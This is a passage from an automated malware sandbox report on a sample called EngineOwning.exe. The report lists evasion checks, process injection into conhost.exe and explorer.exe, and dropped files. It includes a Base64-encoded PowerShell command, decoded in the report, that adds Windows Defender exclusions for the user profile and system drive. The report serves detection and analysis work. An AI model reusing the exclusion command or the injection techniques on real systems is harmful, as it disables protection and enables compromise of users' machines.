      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: C:\ProgramData\mdsigstub.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
      Source: C:\ProgramData\winrsdhost.exe TID: 2044Thread sleep count: 59 > 30
      Source: C:\ProgramData\winrsdhost.exe TID: 2044Thread sleep time: -59000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6708Thread sleep count: 6879 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep count: 1601 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6408Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exe TID: 3952Thread sleep count: 46 > 30
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exe TID: 3952Thread sleep time: -46000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6808Thread sleep count: 6058 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6808Thread sleep count: 323 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6028Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4664Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4352Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6556Thread sleep time: -90000s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6879
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1601
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6058
      Source: C:\Users\user\Desktop\EngineOwning.exeAPI coverage: 5.0 %
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to dropped file
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 35000
      Source: svchost.exe, 0000000E.00000002.703194641.000002A17CA60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
      Source: EngineOwning.exe, 00000000.00000000.489542532.0000018A254E9000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440520651.0000018A254E7000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000000.491968599.0000018A25557000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440438855.0000018A25557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.700865174.000002A17B229000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.703043414.000002A17CA49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000002.702625959.00000229822EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000002.701957253.0000022982271000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.700493754.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.701207386.0000000000AC2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: svchost.exe, 00000012.00000002.699999447.000002AC9FE02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
      Source: EngineOwning.exe, 00000000.00000000.489542532.0000018A254E9000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440520651.0000018A254E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
      Source: svchost.exe, 00000012.00000002.700148358.000002AC9FE28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\ProgramData\winrsdhost.exeProcess information queried: ProcessInformation
      Source: C:\ProgramData\mdsigstub.exeFile Volume queried: C:\ FullSizeInformation
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF76CA0 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,_RTC_CheckStackVars,
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF7D780 MultiByteToWideChar,MultiByteToWideChar,notify_debugger,notify_debugger,IsDebuggerPresent,WideCharToMultiByte,WideCharToMultiByte,
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF7DCD0 VirtualQuery,GetPdbDllFromInstallPath,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,
      Source: C:\ProgramData\winrsdhost.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\ProgramData\winrsdhost.exeMemory allocated: page read and write | page guard
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF7C860 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF7D2D8 SetUnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF7D12C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded <#stgh#> Add-MpPreference <#fep#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#cuh#> -Force <#fje#>
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded <#stgh#> Add-MpPreference <#fep#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#cuh#> -Force <#fje#>
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded <#stgh#> Add-MpPreference <#fep#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#cuh#> -Force <#fje#>
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded <#stgh#> Add-MpPreference <#fep#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#cuh#> -Force <#fje#>
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory allocated: C:\Windows\System32\conhost.exe base: 400000 protect: page execute and read and write
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\System32\conhost.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\System32\conhost.exe base: 400000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\System32\conhost.exe base: 401000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\System32\conhost.exe base: 402000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\System32\conhost.exe base: 416000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\System32\conhost.exe base: 417000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\System32\conhost.exe base: 418000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\System32\conhost.exe base: 351DEC6010
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\explorer.exe base: 140000000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\explorer.exe base: 140001000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\explorer.exe base: 1403A7000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\explorer.exe base: 14051D000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\explorer.exe base: 1407CF000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\explorer.exe base: 1407F0000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\explorer.exe base: 1407F1000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\explorer.exe base: 1407F2000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\explorer.exe base: 1407F5000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: C:\Windows\explorer.exe base: 1407F7000
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: PID: 5388 base: 140000000 value: 4D
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: PID: 5388 base: 140001000 value: 48
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: PID: 5388 base: 1403A7000 value: 62
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: PID: 5388 base: 14051D000 value: E0
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: PID: 5388 base: 1407CF000 value: 00
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: PID: 5388 base: 1407F0000 value: 48
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: PID: 5388 base: 1407F1000 value: C5
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: PID: 5388 base: 1407F2000 value: 48
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: PID: 5388 base: 1407F5000 value: 48
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeMemory written: PID: 5388 base: 1407F7000 value: 7E
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeThread register set: target process: 6540
      Source: C:\ProgramData\winrsdhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A"
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A"
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe zaxwujrpzpz0 NV/UX0XBuNRBWS1fF1Br++rCWld6jYh8EV4bO5NNvAb/5HIZwMhaD5NHJK5z9yNMjMMytH6YY4V55yfqWTQcp12cDSmlF6KKjp+Efu9KvL4SaXUjJ1+pbf+qj6k80A11p9RBq/ea7q4JQbAof6DO9w2NSwY2P/eQdDvkJvlXTHwvNMDMUjwmGA6FU/A9poINN+IS9cW53yukVYFD6Su/c8CqGYS4ifglLSM0j7mQykFqVEF0CjxSELaijRRGUV4pKZhHpb12LA0Vdcl7ekwOnt/zMSPiSwVay5rEBRJnuUFPIIktvItGKBK4ACGTOTqoPi0Hwp99GwYdY6hvlhzROvSxGFr63zNaVIZV1HL7mUPX5ICuxBxUgAURBxJcPcCDFtB6+YHcgebLsBjBHY6e778xlKAi+KMQhPPHAt2IhKnBuQNhYbkw20Qh4OsKyGjRuikRJY8g3TEE/RpYBkU2gM2pude0dusb3bcc6h3jJ8mqx1aqIvyYff4zch7WANZWOTWRwEz/LV6jXQrqAfeuV/LYITPX+2lLumdpKzFrcng=
      Source: C:\ProgramData\winrsdhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A
